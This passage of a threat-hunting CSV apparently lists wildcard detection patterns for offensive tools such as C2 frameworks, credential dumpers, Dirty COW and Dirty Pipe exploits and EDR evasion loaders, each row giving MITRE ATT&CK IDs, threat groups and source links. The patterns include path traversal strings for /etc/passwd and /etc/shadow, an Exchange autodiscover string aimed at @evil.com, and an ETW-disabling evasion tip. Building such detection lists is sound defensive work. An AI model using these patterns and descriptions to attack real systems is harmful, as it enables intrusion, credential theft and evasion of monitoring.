T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*!put */tmp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!shell *","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!tunnels --tcp*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!use *aes256_py*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!use *reflected_assembly*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","0","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" +"*!wPkgPath!*!ak!*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*$attacker_IPlist*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*$C2_SERVER*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*$DummyServiceName*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$env:COMPlus_ETWEnabled=0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","0","N/A","10","10","1002","111","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" +"*$KeePassBinaryPath*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*$KeePassUser*","offensive_tool_keyword","crackmapexec","Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*%APPDATA%/Indexing.*","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*%comspec% /k *.bat*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*%COMSPEC%*echo*\pipe\*","greyware_tool_keyword","echo","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1068.003 - T1078.002","TA0004 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*%SystemRoot%\\MEMORY.DMP*","greyware_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" +"*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*&& telnet * 2>&1 &Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*...::$index_allocation*","greyware_tool_keyword","$index_allocation","creation of hidden folders (and file) via ...$.......::$index_allocation","T1027.001 - T1564.001","TA0005 ","N/A","N/A","Defense Evasion","https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*./*octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*./agscript *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./awsloot *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*./awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*./c2lint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*./chisel *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*./cowpy.sh *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*./cowroot*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","0","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" +"*./dcow -s*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","3","289","122","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z" +"*./Dent -*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" +"*./dirty*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","8","767","437","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" +"*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" +"*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" +"*./dnscat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" +"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./encryptor -f *.exe -o *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" +"*./Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*./exploit /etc/passwd 1 *cat /etc/passwd*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" +"*./exploit /etc/passwd 1 ootz:*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" +"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*./fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" +"*./gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" +"*./getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" +"*./gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" +"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*./hashcat -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" +"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*./Ivy -*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" +"*./koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*./Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" +"*./litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and 